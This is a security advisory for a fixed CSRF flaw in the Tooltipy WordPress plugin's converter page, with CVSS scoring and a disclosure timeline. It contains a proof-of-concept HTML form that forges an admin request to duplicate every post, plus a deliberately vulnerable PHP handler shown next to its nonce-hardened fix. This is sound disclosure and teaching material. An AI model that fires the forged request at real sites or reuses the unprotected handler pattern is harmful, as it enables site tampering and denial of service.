Advisory:

CSRF in Tooltipy (tooltips for WP) could allow anybody to duplicate posts

Vulnerability

Last revised:

There is a CSRF vulnerability in Tooltipy’s “KTTG Converter” feature. The converter’s tools page acts on any POST request that carries the expected parameters, with no check that the request originated from the plugin’s own form, so an attacker who can get a logged-in administrator to follow a link or load an attacker-controlled page can trigger the conversion with the admin’s session cookies and duplicate posts. The PoC below duplicates every post with post_type post. The most obvious malicious use is to fill up a disk or database quota, which may lead to denial of service or other issues.

Current state: Fixed

CVSS Summary

CVSS v2 base score for this vulnerability: 4.3 (Medium)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

  • Access Vector: Network
  • Access Complexity: Medium
  • Authentication: None
  • Confidentiality Impact: None
  • Integrity Impact: Partial
  • Availability Impact: None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

While logged in to the target site as an administrator, open a page containing the following HTML (the action URL assumes the site runs at http://localhost) and click submit:

<form method="POST" action="http://localhost/wp-admin/tools.php?page=my_keywords_settings_importer">
 <input type="text" name="go" value="true">
 <input type="text" name="bluet_posttypes_list" value="post">
 <input type="submit">
</form>

Every post with post_type post will have been duplicated.

In a real attack the form is made to auto-submit with a line of JavaScript, so the victim only has to load the attacker’s page. The browser attaches the admin’s session cookies to the forged request exactly as it would to a genuine submission from the tools page, so nothing on the server distinguishes the two.
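To show what makes such a handler forgeable and how a nonce closes the hole, the following is an added illustration written for this advisory, not Tooltipy’s own code: a hypothetical WordPress tools-page handler in the shape the PoC targets, first in the vulnerable pattern and then hardened. The function names (kttg_importer_page_vulnerable, kttg_importer_page_fixed, kttg_convert_posts) and the nonce action string kttg_convert_posts are assumptions invented for the example; only the parameter names go and bluet_posttypes_list come from the PoC.

```php
<?php
// Added illustration, not the plugin's actual code. Function names and the
// nonce action string are assumptions made up for this example.

// Hypothetical stand-in for the conversion work: copy every post of the given
// types. This is what the forged request ends up triggering.
function kttg_convert_posts( array $types ) {
    $posts = get_posts( array( 'post_type' => $types, 'numberposts' => -1 ) );
    foreach ( $posts as $p ) {
        wp_insert_post( array(
            'post_title'   => $p->post_title,
            'post_content' => $p->post_content,
            'post_type'    => $p->post_type,
            'post_status'  => $p->post_status,
        ) );
    }
}

// --- Vulnerable pattern: acts on any POST that carries go=true --------------
function kttg_importer_page_vulnerable() {
    if ( isset( $_POST['go'] ) && 'true' === $_POST['go'] ) {
        // Nothing ties this request to a form the admin actually submitted:
        // a cross-site form with the same field names is indistinguishable,
        // and the browser sends the admin's cookies with it.
        $types = isset( $_POST['bluet_posttypes_list'] )
            ? (array) $_POST['bluet_posttypes_list'] : array();
        kttg_convert_posts( $types );
    }
    echo '<form method="post">';
    echo '<input type="hidden" name="go" value="true">';
    echo '<input type="text" name="bluet_posttypes_list" value="post">';
    submit_button( 'Convert' );
    echo '</form>';
}

// --- Hardened pattern: capability check plus a nonce bound to this action ---
function kttg_importer_page_fixed() {
    if ( isset( $_POST['go'] ) && 'true' === $_POST['go'] ) {
        // 1. Authorization: only users allowed to manage the site may convert.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Insufficient permissions.' );
        }
        // 2. Intent: check_admin_referer() verifies the _wpnonce field against
        //    the action name and the logged-in user, and dies on mismatch, so a
        //    forged POST never reaches the conversion below.
        check_admin_referer( 'kttg_convert_posts' );

        $types = isset( $_POST['bluet_posttypes_list'] )
            ? (array) $_POST['bluet_posttypes_list'] : array();
        $types = array_map( 'sanitize_key', $types );
        kttg_convert_posts( $types );
    }
    echo '<form method="post">';
    // Emits a hidden _wpnonce input tied to the action and the current user.
    // An attacker's page cannot read it (same-origin policy) or guess it.
    wp_nonce_field( 'kttg_convert_posts' );
    echo '<input type="hidden" name="go" value="true">';
    echo '<input type="text" name="bluet_posttypes_list" value="post">';
    submit_button( 'Convert' );
    echo '</form>';
}
```

Against the hardened handler the PoC form fails at check_admin_referer(): it carries no _wpnonce, and the attacker cannot obtain one because the nonce is generated server-side for the logged-in user and the same-origin policy stops a cross-site page from reading the tools page. The capability check is kept as a separate step because a nonce proves that the request came from the plugin’s own form, not that the user is allowed to perform the action; both checks must run before any work is done.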

Advisory timeline

  • 2018-03-29: Discovered
  • 2018-04-10: Reported to vendor via email (first attempt)
  • 2018-04-30: Asked if they’d received the email, via Facebook private message (second attempt)
  • 2018-05-03: Reported again via contact form (third attempt)
  • 2018-05-18: Reported to plugins@wordpress.org
  • 2018-05-18: WordPress plugin team disabled downloads of the plugin
  • 2018-05-21: Vendor reported a fix has been made for the bug (first contact from vendor)
  • 2018-06-05: Updated version of plugin is now available for download on wordpress.org
  • 2018-06-12: Advisory published
  • 2018-06-12: CVE requested
  • 2018-06-23: CVE assigned

Mitigation/further actions

Upgrade to version 5.1 or later.